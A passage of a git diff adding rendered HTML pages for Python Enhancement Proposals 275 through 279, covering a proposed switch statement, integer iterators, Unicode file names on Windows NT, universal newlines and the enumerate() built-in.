The new optimization should not change the current Python +semantics (by reducing the number of __cmp__ calls and adding +__hash__ calls in if-elif-else constructs which are affected +by the optimization). To assure this, switching can only +safely be implemented either if a “from __future__” style +flag is used, or the switching variable is one of the builtin +immutable types: int, float, string, unicode, etc. (not +subtypes, since it’s not clear whether these are still +immutable or not)

+

To prevent post-modifications of the jump-table dictionary +(which could be used to reach protected code), the jump-table +will have to be a read-only type (e.g. a read-only +dictionary).

+

The optimization should only be used for if-elif-else +constructs which have a minimum number of n cases (where n is +a number which has yet to be defined depending on performance +tests).

+
+
+

Solution 2: Adding a switch statement to Python

+
+

New Syntax

+
switch EXPR:
+    case CONSTANT:
+        SUITE
+    case CONSTANT:
+        SUITE
+    ...
+    else:
+        SUITE
+
+
+

(modulo indentation variations)

+

The “else” part is optional. If no else part is given and +none of the defined cases matches, no action is taken and +the switch statement is ignored. This is in line with the +current if-behaviour. A user who wants to signal this +situation using an exception can define an else-branch +which then implements the intended action.

+

Note that the constants need not be all of the same type, but +they should be comparable to the type of the switch variable.

+
+
+

Implementation

+

The compiler would have to compile this into byte code +similar to this:

+
def whatis(x):
+    switch(x):
+        case 'one':
+            print '1'
+        case 'two':
+            print '2'
+        case 'three':
+            print '3'
+        else:
+            print "D'oh!"
+
+
+

into (omitting POP_TOP’s and SET_LINENO’s):

+
   6  LOAD_FAST         0 (x)
+   9  LOAD_CONST        1 (switch-table-1)
+  12  SWITCH            26 (to 38)
+
+  14  LOAD_CONST        2 ('1')
+  17  PRINT_ITEM
+  18  PRINT_NEWLINE
+  19  JUMP 43
+
+  22  LOAD_CONST        3 ('2')
+  25  PRINT_ITEM
+  26  PRINT_NEWLINE
+  27  JUMP 43
+
+  30  LOAD_CONST        4 ('3')
+  33  PRINT_ITEM
+  34  PRINT_NEWLINE
+  35  JUMP 43
+
+  38  LOAD_CONST        5 ("D'oh!")
+  41  PRINT_ITEM
+  42  PRINT_NEWLINE
+
+>>43  LOAD_CONST        0 (None)
+  46  RETURN_VALUE
+
+
+

Where the ‘SWITCH’ opcode would jump to 14, 22, 30 or 38 +depending on ‘x’.

+

Thomas Wouters has written a patch which demonstrates the +above. You can download it from [1].

+
+
+

Issues

+

The switch statement should not implement fall-through +behaviour (as does the switch statement in C). Each case +defines a complete and independent suite; much like in an +if-elif-else statement. This also enables using break in +switch statements inside loops.

+

If the interpreter finds that the switch variable x is +not hashable, it should raise a TypeError at run-time +pointing out the problem.

+

There have been other proposals for the syntax which reuse +existing keywords and avoid adding two new ones (“switch” and +“case”). Others have argued that the keywords should use new +terms to avoid confusion with the C keywords of the same name +but slightly different semantics (e.g. fall-through without +break). Some of the proposed variants:

+
case EXPR:
+    of CONSTANT:
+        SUITE
+    of CONSTANT:
+        SUITE
+    else:
+        SUITE
+
+case EXPR:
+    if CONSTANT:
+         SUITE
+    if CONSTANT:
+        SUITE
+    else:
+        SUITE
+
+when EXPR:
+    in CONSTANT_TUPLE:
+        SUITE
+    in CONSTANT_TUPLE:
+        SUITE
+    ...
+else:
+     SUITE
+
+
+

The switch statement could be extended to allow multiple +values for one section (e.g. case ‘a’, ‘b’, ‘c’: …). Another +proposed extension would allow ranges of values (e.g. case +10..14: …). These should probably be post-poned, but already +kept in mind when designing and implementing a first version.

+
+
+
+

Examples

+

The following examples all use a new syntax as proposed by +solution 2. However, all of these examples would work with +solution 1 as well.

+
switch EXPR:                   switch x:
+    case CONSTANT:                 case "first":
+        SUITE                          print x
+    case CONSTANT:                 case "second":
+        SUITE                          x = x**2
+    ...                                print x
+    else:                          else:
+        SUITE                          print "whoops!"
+
+
+case EXPR:                     case x:
+    of CONSTANT:                   of "first":
+        SUITE                          print x
+    of CONSTANT:                   of "second":
+        SUITE                          print x**2
+    else:                          else:
+        SUITE                          print "whoops!"
+
+
+case EXPR:                     case state:
+    if CONSTANT:                   if "first":
+         SUITE                         state = "second"
+    if CONSTANT:                   if "second":
+        SUITE                          state = "third"
+    else:                          else:
+        SUITE                          state = "first"
+
+
+when EXPR:                     when state:
+    in CONSTANT_TUPLE:             in ("first", "second"):
+        SUITE                          print state
+    in CONSTANT_TUPLE:                 state = next_state(state)
+        SUITE                      in ("seventh",):
+    ...                                print "done"
+else:                                  break    # out of loop!
+     SUITE                     else:
+                                   print "middle state"
+                                   state = next_state(state)
+
+
+

Here’s another nice application found by Jack Jansen (switching +on argument types):

+
switch type(x).__name__:
+    case 'int':
+        SUITE
+    case 'string':
+        SUITE
+
+
+
+
+
+

Scope

+

XXX Explain “from __future__ import switch”

+
+
+

Credits

+
    +
  • Martin von Löwis (issues with the optimization idea)
  • +
  • Thomas Wouters (switch statement + byte code compiler example)
  • +
  • Skip Montanaro (dispatching ideas, examples)
  • +
  • Donald Beaudry (switch syntax)
  • +
  • Greg Ewing (switch syntax)
  • +
  • Jack Jansen (type switching examples)
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0275.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0276/index.html b/pep-0276/index.html new file mode 100644 index 00000000000..339242f1d2e --- /dev/null +++ b/pep-0276/index.html @@ -0,0 +1,481 @@ + + + + + + + + PEP 276 – Simple Iterator for ints | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 276 – Simple Iterator for ints

+
+
Author:
+
Jim Althoff <james_althoff at i2.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
12-Nov-2001
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Python 2.1 added new functionality to support iterators (PEP 234). +Iterators have proven to be useful and convenient in many coding +situations. It is noted that the implementation of Python’s +for-loop control structure uses the iterator protocol as of +release 2.1. It is also noted that Python provides iterators for +the following builtin types: lists, tuples, dictionaries, strings, +and files. This PEP proposes the addition of an iterator for the +builtin type int (types.IntType). Such an iterator would simplify +the coding of certain for-loops in Python.

+
+
+

BDFL Pronouncement

+

This PEP was rejected on 17 June 2005 with a note to python-dev.

+

Much of the original need was met by the enumerate() function which +was accepted for Python 2.3.

+

Also, the proposal both allowed and encouraged misuses such as:

+
>>> for i in 3: print i
+0
+1
+2
+
+
+

Likewise, it was not helpful that the proposal would disable the +syntax error in statements like:

+
x, = 1
+
+
+
+
+

Specification

+

Define an iterator for types.intType (i.e., the builtin type +“int”) that is returned from the builtin function “iter” when +called with an instance of types.intType as the argument.

+

The returned iterator has the following behavior:

+
    +
  • Assume that object i is an instance of types.intType (the +builtin type int) and that i > 0
  • +
  • iter(i) returns an iterator object
  • +
  • said iterator object iterates through the sequence of ints +0,1,2,…,i-1

    Example:

    +
    +
    iter(5) returns an iterator object that iterates through the +sequence of ints 0,1,2,3,4
    +
  • +
  • if i <= 0, iter(i) returns an “empty” iterator, i.e., one that +throws StopIteration upon the first call of its “next” method
  • +
+

In other words, the conditions and semantics of said iterator is +consistent with the conditions and semantics of the range() and +xrange() functions.

+

Note that the sequence 0,1,2,…,i-1 associated with the int i is +considered “natural” in the context of Python programming because +it is consistent with the builtin indexing protocol of sequences +in Python. Python lists and tuples, for example, are indexed +starting at 0 and ending at len(object)-1 (when using positive +indices). In other words, such objects are indexed with the +sequence 0,1,2,…,len(object)-1

+
+
+

Rationale

+

A common programming idiom is to take a collection of objects and +apply some operation to each item in the collection in some +established sequential order. Python provides the “for in” +looping control structure for handling this common idiom. Cases +arise, however, where it is necessary (or more convenient) to +access each item in an “indexed” collection by iterating through +each index and accessing each item in the collection using the +corresponding index.

+

For example, one might have a two-dimensional “table” object where one +requires the application of some operation to the first column of +each row in the table. Depending on the implementation of the table +it might not be possible to access first each row and then each +column as individual objects. It might, rather, be possible to +access a cell in the table using a row index and a column index. +In such a case it is necessary to use an idiom where one iterates +through a sequence of indices (indexes) in order to access the +desired items in the table. (Note that the commonly used +DefaultTableModel class in Java-Swing-Jython has this very protocol).

+

Another common example is where one needs to process two or more +collections in parallel. Another example is where one needs to +access, say, every second item in a collection.

+

There are many other examples where access to items in a +collection is facilitated by a computation on an index thus +necessitating access to the indices rather than direct access to +the items themselves.

+

Let’s call this idiom the “indexed for-loop” idiom. Some +programming languages provide builtin syntax for handling this +idiom. In Python the common convention for implementing the +indexed for-loop idiom is to use the builtin range() or xrange() +function to generate a sequence of indices as in, for example:

+
for rowcount in range(table.getRowCount()):
+    print table.getValueAt(rowcount, 0)
+
+
+

or

+
for rowcount in xrange(table.getRowCount()):
+    print table.getValueAt(rowcount, 0)
+
+
+

From time to time there are discussions in the Python community +about the indexed for-loop idiom. It is sometimes argued that the +need for using the range() or xrange() function for this design +idiom is:

+
    +
  • Not obvious (to new-to-Python programmers),
  • +
  • Error prone (easy to forget, even for experienced Python +programmers)
  • +
  • Confusing and distracting for those who feel compelled to understand +the differences and recommended usage of xrange() vis-a-vis range()
  • +
  • Unwieldy, especially when combined with the len() function, +i.e., xrange(len(sequence))
  • +
  • Not as convenient as equivalent mechanisms in other languages,
  • +
  • Annoying, a “wart”, etc.
  • +
+

And from time to time proposals are put forth for ways in which +Python could provide a better mechanism for this idiom. Recent +examples include PEP 204, “Range Literals”, and PEP 212, “Loop +Counter Iteration”.

+

Most often, such proposal include changes to Python’s syntax and +other “heavyweight” changes.

+

Part of the difficulty here is that advocating new syntax implies +a comprehensive solution for “general indexing” that has to +include aspects like:

+
    +
  • starting index value
  • +
  • ending index value
  • +
  • step value
  • +
  • open intervals versus closed intervals versus half opened intervals
  • +
+

Finding a new syntax that is comprehensive, simple, general, +Pythonic, appealing to many, easy to implement, not in conflict +with existing structures, not excessively overloading of existing +structures, etc. has proven to be more difficult than one might +anticipate.

+

The proposal outlined in this PEP tries to address the problem by +suggesting a simple “lightweight” solution that helps the most +common case by using a proven mechanism that is already available +(as of Python 2.1): namely, iterators.

+

Because for-loops already use “iterator” protocol as of Python +2.1, adding an iterator for types.IntType as proposed in this PEP +would enable by default the following shortcut for the indexed +for-loop idiom:

+
for rowcount in table.getRowCount():
+    print table.getValueAt(rowcount, 0)
+
+
+

The following benefits for this approach vis-a-vis the current +mechanism of using the range() or xrange() functions are claimed +to be:

+
    +
  • Simpler,
  • +
  • Less cluttered,
  • +
  • Focuses on the problem at hand without the need to resort to +secondary implementation-oriented functions (range() and +xrange())
  • +
+

And compared to other proposals for change:

+
    +
  • Requires no new syntax
  • +
  • Requires no new keywords
  • +
  • Takes advantage of the new and well-established iterator mechanism
  • +
+

And generally:

+
    +
  • Is consistent with iterator-based “convenience” changes already +included (as of Python 2.1) for other builtin types such as: +lists, tuples, dictionaries, strings, and files.
  • +
+
+
+

Backwards Compatibility

+

The proposed mechanism is generally backwards compatible as it +calls for neither new syntax nor new keywords. All existing, +valid Python programs should continue to work unmodified.

+

However, this proposal is not perfectly backwards compatible in +the sense that certain statements that are currently invalid +would, under the current proposal, become valid.

+

Tim Peters has pointed out two such examples:

+
    +
  1. The common case where one forgets to include range() or +xrange(), for example:
    for rowcount in table.getRowCount():
    +    print table.getValueAt(rowcount, 0)
    +
    +
    +

    in Python 2.2 raises a TypeError exception.

    +

    Under the current proposal, the above statement would be valid +and would work as (presumably) intended. Presumably, this is a +good thing.

    +

    As noted by Tim, this is the common case of the “forgotten +range” mistake (which one currently corrects by adding a call +to range() or xrange()).

    +
  2. +
  3. The (hopefully) very uncommon case where one makes a typing +mistake when using tuple unpacking. For example:
    x, = 1
    +
    +
    +

    in Python 2.2 raises a TypeError exception.

    +

    Under the current proposal, the above statement would be valid +and would set x to 0. The PEP author has no data as to how +common this typing error is nor how difficult it would be to +catch such an error under the current proposal. He imagines +that it does not occur frequently and that it would be +relatively easy to correct should it happen.

    +
  4. +
+
+
+

Issues

+

Extensive discussions concerning PEP 276 on the Python interest +mailing list suggests a range of opinions: some in favor, some +neutral, some against. Those in favor tend to agree with the +claims above of the usefulness, convenience, ease of learning, +and simplicity of a simple iterator for integers.

+

Issues with PEP 276 include:

+
    +
  • Using range/xrange is fine as is.

    Response: Some posters feel this way. Other disagree.

    +
  • +
  • Some feel that iterating over the sequence “0, 1, 2, …, n-1” +for an integer n is not intuitive. “for i in 5:” is considered +(by some) to be “non-obvious”, for example. Some dislike this +usage because it doesn’t have “the right feel”. Some dislike it +because they believe that this type of usage forces one to view +integers as a sequences and this seems wrong to them. Some +dislike it because they prefer to view for-loops as dealing +with explicit sequences rather than with arbitrary iterators.

    Response: Some like the proposed idiom and see it as simple, +elegant, easy to learn, and easy to use. Some are neutral on +this issue. Others, as noted, dislike it.

    +
  • +
  • Is it obvious that iter(5) maps to the sequence 0,1,2,3,4?

    Response: Given, as noted above, that Python has a strong +convention for indexing sequences starting at 0 and stopping at +(inclusively) the index whose value is one less than the length +of the sequence, it is argued that the proposed sequence is +reasonably intuitive to the Python programmer while being useful +and practical. More importantly, it is argued that once learned +this convention is very easy to remember. Note that the doc +string for the range function makes a reference to the +natural and useful association between range(n) and the indices +for a list whose length is n.

    +
  • +
  • Possible ambiguity
    for i in 10: print i
    +
    +
    +

    might be mistaken for

    +
    for i in (10,): print i
    +
    +
    +

    Response: This is exactly the same situation with strings in +current Python (replace 10 with ‘spam’ in the above, for +example).

    +
  • +
  • Too general: in the newest releases of Python there are +contexts – as with for-loops – where iterators are called +implicitly. Some fear that having an iterator invoked for +an integer in one of the context (excluding for-loops) might +lead to unexpected behavior and bugs. The “x, = 1” example +noted above is an a case in point.

    Response: From the author’s perspective the examples of the +above that were identified in the PEP 276 discussions did +not appear to be ones that would be accidentally misused +in ways that would lead to subtle and hard-to-detect errors.

    +

    In addition, it seems that there is a way to deal with this +issue by using a variation of what is outlined in the +specification section of this proposal. Instead of adding +an __iter__ method to class int, change the for-loop handling +code to convert (in essence) from

    +
    for i in n:  # when isinstance(n,int) is 1
    +
    +
    +

    to

    +
    for i in xrange(n):
    +
    +
    +

    This approach gives the same results in a for-loop as an +__iter__ method would but would prevent iteration on integer +values in any other context. Lists and tuples, for example, +don’t have __iter__ and are handled with special code. +Integer values would be one more special case.

    +
  • +
  • “i in n” seems very unnatural.

    Response: Some feel that “i in len(mylist)” would be easily +understandable and useful. Some don’t like it, particularly +when a literal is used as in “i in 5”. If the variant +mentioned in the response to the previous issue is implemented, +this issue is moot. If not, then one could also address this +issue by defining a __contains__ method in class int that would +always raise a TypeError. This would then make the behavior of +“i in n” identical to that of current Python.

    +
  • +
  • Might dissuade newbies from using the indexed for-loop idiom when +the standard “for item in collection:” idiom is clearly better.

    Response: The standard idiom is so nice when it fits that it +needs neither extra “carrot” nor “stick”. On the other hand, +one does notice cases of overuse/misuse of the standard idiom +(due, most likely, to the awkwardness of the indexed for-loop +idiom), as in:

    +
    for item in sequence:
    +    print sequence.index(item)
    +
    +
    +
  • +
  • Why not propose even bigger changes?
  • +
+

The majority of disagreement with PEP 276 came from those who +favor much larger changes to Python to address the more general +problem of specifying a sequence of integers where such +a specification is general enough to handle the starting value, +ending value, and stepping value of the sequence and also +addresses variations of open, closed, and half-open (half-closed) +integer intervals. Many suggestions of such were discussed.

+

These include:

+
    +
  • adding Haskell-like notation for specifying a sequence of +integers in a literal list,
  • +
  • various uses of slicing notation to specify sequences,
  • +
  • changes to the syntax of for-in loops to allow the use of +relational operators in the loop header,
  • +
  • creation of an integer-interval class along with methods that +overload relational operators or division operators +to provide “slicing” on integer-interval objects,
  • +
  • and more.
  • +
+

It should be noted that there was much debate but not an +overwhelming consensus for any of these larger-scale suggestions.

+

Clearly, PEP 276 does not propose such a large-scale change +and instead focuses on a specific problem area. Towards the +end of the discussion period, several posters expressed favor +for the narrow focus and simplicity of PEP 276 vis-a-vis the more +ambitious suggestions that were advanced. There did appear to be +consensus for the need for a PEP for any such larger-scale, +alternative suggestion. In light of this recognition, details of +the various alternative suggestions are not discussed here further.

+
+
+

Implementation

+

An implementation is not available at this time but is expected +to be straightforward. The author has implemented a subclass of +int with an __iter__ method (written in Python) as a means to test +out the ideas in this proposal, however.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0276.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0277/index.html b/pep-0277/index.html new file mode 100644 index 00000000000..d11cedb3513 --- /dev/null +++ b/pep-0277/index.html @@ -0,0 +1,225 @@ + + + + + + + + PEP 277 – Unicode file name support for Windows NT | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 277 – Unicode file name support for Windows NT

+
+
Author:
+
Neil Hodgson <neilh at scintilla.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Jan-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP discusses supporting access to all files possible on +Windows NT by passing Unicode file names directly to the system’s +wide-character functions.

+
+
+

Rationale

+

Python 2.2 on Win32 platforms converts Unicode file names passed +to open and to functions in the os module into the ‘mbcs’ encoding +before passing the result to the operating system. This is often +successful in the common case where the script is operating with +the locale set to the same value as when the file was created. +Most machines are set up as one locale and rarely if ever changed +from this locale. For some users, locale is changed more often +and on servers there are often files saved by users using +different locales.

+

On Windows NT and descendent operating systems, including Windows +2000 and Windows XP, wide-character APIs are available that +provide direct access to all file names, including those that are +not representable using the current locale. The purpose of this +proposal is to provide access to these wide-character APIs through +the standard Python file object and posix module and so provide +access to all files on Windows NT.

+
+
+

Specification

+

On Windows platforms which provide wide-character file APIs, when +Unicode arguments are provided to file APIs, wide-character calls +are made instead of the standard C library and posix calls.

+

The Python file object is extended to use a Unicode file name +argument directly rather than converting it. This affects the +file object constructor file(filename[, mode[, bufsize]]) and also +the open function which is an alias of this constructor. When a +Unicode filename argument is used here then the name attribute of +the file object will be Unicode. The representation of a file +object, repr(f) will display Unicode file names as an escaped +string in a similar manner to the representation of Unicode +strings.

+

The posix module contains functions that take file or directory +names: chdir, listdir, mkdir, open, remove, rename, +rmdir, stat, and _getfullpathname. These will use Unicode +arguments directly rather than converting them. For the rename function, this +behaviour is triggered when either of the arguments is Unicode and +the other argument converted to Unicode using the default +encoding.

+

The listdir function currently returns a list of strings. Under +this proposal, it will return a list of Unicode strings when its +path argument is Unicode.

+
+
+

Restrictions

+

On the consumer Windows operating systems, Windows 95, Windows 98, +and Windows ME, there are no wide-character file APIs so behaviour +is unchanged under this proposal. It may be possible in the +future to extend this proposal to cover these operating systems as +the VFAT-32 file system used by them does support Unicode file +names but access is difficult and so implementing this would +require much work. The “Microsoft Layer for Unicode” could be a +starting point for implementing this.

+

Python can be compiled with the size of Unicode characters set to +4 bytes rather than 2 by defining PY_UNICODE_TYPE to be a 4 byte +type and Py_UNICODE_SIZE to be 4. As the Windows API does not +accept 4 byte characters, the features described in this proposal +will not work in this mode so the implementation falls back to the +current ‘mbcs’ encoding technique. This restriction could be lifted +in the future by performing extra conversions using +PyUnicode_AsWideChar but for now that would add too much +complexity for a very rarely used feature.

+
+
+

Reference Implementation

+

The implementation is available at [2].

+
+
+

References

+

[1] Microsoft Windows APIs + https://msdn.microsoft.com/

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0277.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0278/index.html b/pep-0278/index.html new file mode 100644 index 00000000000..1738c5382c2 --- /dev/null +++ b/pep-0278/index.html @@ -0,0 +1,297 @@ + + + + + + + + PEP 278 – Universal Newline Support | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 278 – Universal Newline Support

+
+
Author:
+
Jack Jansen <jack at cwi.nl>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Jan-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP discusses a way in which Python can support I/O on files +which have a newline format that is not the native format on the +platform, so that Python on each platform can read and import +files with CR (Macintosh), LF (Unix) or CR LF (Windows) line +endings.

+

It is more and more common to come across files that have an end +of line that does not match the standard on the current platform: +files downloaded over the net, remotely mounted filesystems on a +different platform, Mac OS X with its double standard of Mac and +Unix line endings, etc.

+

Many tools such as editors and compilers already handle this +gracefully, it would be good if Python did so too.

+
+
+

Specification

+

Universal newline support is enabled by default, +but can be disabled during the configure of Python.

+

In a Python with universal newline support the feature is +automatically enabled for all import statements and execfile() +calls. There is no special support for eval() or exec.

+

In a Python with universal newline support open() the mode +parameter can also be “U”, meaning “open for input as a text file +with universal newline interpretation”. Mode “rU” is also allowed, +for symmetry with “rb”. Mode “U” cannot be +combined with other mode flags such as “+”. Any line ending in the +input file will be seen as a '\n' in Python, so little other code has +to change to handle universal newlines.

+

Conversion of newlines happens in all calls that read data: read(), +readline(), readlines(), etc.

+

There is no special support for output to file with a different +newline convention, and so mode “wU” is also illegal.

+

A file object that has been opened in universal newline mode gets +a new attribute “newlines” which reflects the newline convention +used in the file. The value for this attribute is one of None (no +newline read yet), "\r", "\n", "\r\n" or a tuple containing all the +newline types seen.

+
+
+

Rationale

+

Universal newline support is implemented in C, not in Python. +This is done because we want files with a foreign newline +convention to be import-able, so a Python Lib directory can be +shared over a remote file system connection, or between MacPython +and Unix-Python on Mac OS X. For this to be feasible the +universal newline convention needs to have a reasonably small +impact on performance, which means a Python implementation is not +an option as it would bog down all imports. And because of files +with multiple newline conventions, which Visual C++ and other +Windows tools will happily produce, doing a quick check for the +newlines used in a file (handing off the import to C code if a +platform-local newline is seen) will not work. Finally, a C +implementation also allows tracebacks and such (which open the +Python source module) to be handled easily.

+

There is no output implementation of universal newlines, Python +programs are expected to handle this by themselves or write files +with platform-local convention otherwise. The reason for this is +that input is the difficult case, outputting different newlines to +a file is already easy enough in Python.

+

Also, an output implementation would be much more difficult than an +input implementation, surprisingly: a lot of output is done through +PyXXX_Print() methods, and at this point the file object is not +available anymore, only a FILE *. So, an output implementation would +need to somehow go from the FILE* to the file object, because that +is where the current newline delimiter is stored.

+

The input implementation has no such problem: there are no cases in +the Python source tree where files are partially read from C, +partially from Python, and such cases are expected to be rare in +extension modules. If such cases exist the only problem is that the +newlines attribute of the file object is not updated during the +fread() or fgets() calls that are done direct from C.

+

A partial output implementation, where strings passed to fp.write() +would be converted to use fp.newlines as their line terminator but +all other output would not is far too surprising, in my view.

+

Because there is no output support for universal newlines there is +also no support for a mode “rU+”: the surprise factor of the +previous paragraph would hold to an even stronger degree.

+

There is no support for universal newlines in strings passed to +eval() or exec. It is envisioned that such strings always have the +standard \n line feed, if the strings come from a file that file can +be read with universal newlines.

+

I think there are no special issues with unicode. utf-16 shouldn’t +pose any new problems, as such files need to be opened in binary +mode anyway. Interaction with utf-8 is fine too: values 0x0a and 0x0d +cannot occur as part of a multibyte sequence.

+

Universal newline files should work fine with iterators and +xreadlines() as these eventually call the normal file +readline/readlines methods.

+

While universal newlines are automatically enabled for import they +are not for opening, where you have to specifically say open(..., +"U"). This is open to debate, but here are a few reasons for this +design:

+
    +
  • Compatibility. Programs which already do their own +interpretation of \r\n in text files would break. Examples of such +programs would be editors which warn you when you open a file with +a different newline convention. If universal newlines was made the +default such an editor would silently convert your line endings to +the local convention on save. Programs which open binary files as +text files on Unix would also break (but it could be argued they +deserve it :-).
  • +
  • Interface clarity. Universal newlines are only supported for +input files, not for input/output files, as the semantics would +become muddy. Would you write Mac newlines if all reads so far +had encountered Mac newlines? But what if you then later read a +Unix newline?
  • +
+

The newlines attribute is included so that programs that really +care about the newline convention, such as text editors, can +examine what was in a file. They can then save (a copy of) the +file with the same newline convention (or, in case of a file with +mixed newlines, ask the user what to do, or output in platform +convention).

+

Feedback is explicitly solicited on one item in the reference +implementation: whether or not the universal newlines routines +should grab the global interpreter lock. Currently they do not, +but this could be considered living dangerously, as they may +modify fields in a FileObject. But as these routines are +replacements for fgets() and fread() as well it may be difficult +to decide whether or not the lock is held when the routine is +called. Moreover, the only danger is that if two threads read the +same FileObject at the same time an extraneous newline may be seen +or the newlines attribute may inadvertently be set to mixed. I +would argue that if you read the same FileObject in two threads +simultaneously you are asking for trouble anyway.

+

Note that no globally accessible pointers are manipulated in the +fgets() or fread() replacement routines, just some integer-valued +flags, so the chances of core dumps are zero (he said:-).

+

Universal newline support can be disabled during configure because it does +have a small performance penalty, and moreover the implementation has +not been tested on all conceivable platforms yet. It might also be silly +on some platforms (WinCE or Palm devices, for instance). If universal +newline support is not enabled then file objects do not have the newlines +attribute, so testing whether the current Python has it can be done with a +simple:

+
if hasattr(open, 'newlines'):
+   print 'We have universal newline support'
+
+
+

Note that this test uses the open() function rather than the file +type so that it won’t fail for versions of Python where the file +type was not available (the file type was added to the built-in +namespace in the same release as the universal newline feature was +added).

+

Additionally, note that this test fails again on Python versions +>= 2.5, when open() was made a function again and is not synonymous +with the file type anymore.

+
+
+

Reference Implementation

+

A reference implementation is available in SourceForge patch +#476814: https://bugs.python.org/issue476814

+
+
+

References

+

None.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0278.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0279/index.html b/pep-0279/index.html new file mode 100644 index 00000000000..11dca42abd0 --- /dev/null +++ b/pep-0279/index.html @@ -0,0 +1,305 @@ + + + + + + + + PEP 279 – The enumerate() built-in function | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 279 – The enumerate() built-in function

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jan-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces a new built-in function, enumerate() to +simplify a commonly used looping idiom. It provides all iterable +collections with the same advantage that iteritems() affords to +dictionaries – a compact, readable, reliable index notation.

+
+
+

Rationale

+

Python 2.2 introduced the concept of an iterable interface as +proposed in PEP 234. The iter() factory function was provided +as common calling convention and deep changes were made to use +iterators as a unifying theme throughout Python. The unification +came in the form of establishing a common iterable interface for +mappings, sequences, and file objects.

+

Generators, as proposed in PEP 255, were introduced as a means +for making it easier to create iterators, especially ones with +complex internal execution or variable states. The availability +of generators makes it possible to improve on the loop counter +ideas in PEP 212. Those ideas provided a clean syntax for +iteration with indices and values, but did not apply to all +iterable objects. Also, that approach did not have the memory +friendly benefit provided by generators which do not evaluate the +entire sequence all at once.

+

The new proposal is to add a built-in function, enumerate() which +was made possible once iterators and generators became available. +It provides all iterables with the same advantage that iteritems() +affords to dictionaries – a compact, readable, reliable index +notation. Like zip(), it is expected to become a commonly used +looping idiom.

+

This suggestion is designed to take advantage of the existing +implementation and require little additional effort to +incorporate. It is backwards compatible and requires no new +keywords. The proposal will go into Python 2.3 when generators +become final and are not imported from __future__.

+
+
+

BDFL Pronouncements

+

The new built-in function is ACCEPTED.

+
+
+

Specification for a new built-in

+
def enumerate(collection):
+   'Generates an indexed series:  (0,coll[0]), (1,coll[1]) ...'
+   i = 0
+   it = iter(collection)
+   while 1:
+      yield (i, it.next())
+      i += 1
+
+
+

Note A: PEP 212 Loop Counter Iteration discussed several +proposals for achieving indexing. Some of the proposals only work +for lists unlike the above function which works for any generator, +xrange, sequence, or iterable object. Also, those proposals were +presented and evaluated in the world prior to Python 2.2 which did +not include generators. As a result, the non-generator version in +PEP 212 had the disadvantage of consuming memory with a giant list +of tuples. The generator version presented here is fast and +light, works with all iterables, and allows users to abandon the +sequence in mid-stream with no loss of computation effort.

+

There are other PEPs which touch on related issues: integer +iterators, integer for-loops, and one for modifying the arguments +to range and xrange. The enumerate() proposal does not preclude +the other proposals and it still meets an important need even if +those are adopted – the need to count items in any iterable. The +other proposals give a means of producing an index but not the +corresponding value. This is especially problematic if a sequence +is given which doesn’t support random access such as a file +object, generator, or sequence defined with __getitem__.

+

Note B: Almost all of the PEP reviewers welcomed the function but +were divided as to whether there should be any built-ins. The +main argument for a separate module was to slow the rate of +language inflation. The main argument for a built-in was that the +function is destined to be part of a core programming style, +applicable to any object with an iterable interface. Just as +zip() solves the problem of looping over multiple sequences, the +enumerate() function solves the loop counter problem.

+

If only one built-in is allowed, then enumerate() is the most +important general purpose tool, solving the broadest class of +problems while improving program brevity, clarity and reliability.

+

Note C: Various alternative names were discussed:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
iterindexed()five syllables is a mouthful
index()nice verb but could be confused the .index() method
indexed()widely liked however adjectives should be avoided
indexer()noun did not read well in a for-loop
count()direct and explicit but often used in other contexts
itercount()direct, explicit and hated by more than one person
iteritems()conflicts with key:value concept for dictionaries
itemize()confusing because amap.items() != list(itemize(amap))
enum()pithy; less clear than enumerate; too similar to enum +in other languages where it has a different meaning
+

All of the names involving ‘count’ had the further disadvantage of +implying that the count would begin from one instead of zero.

+

All of the names involving ‘index’ clashed with usage in database +languages where indexing implies a sorting operation rather than +linear sequencing.

+

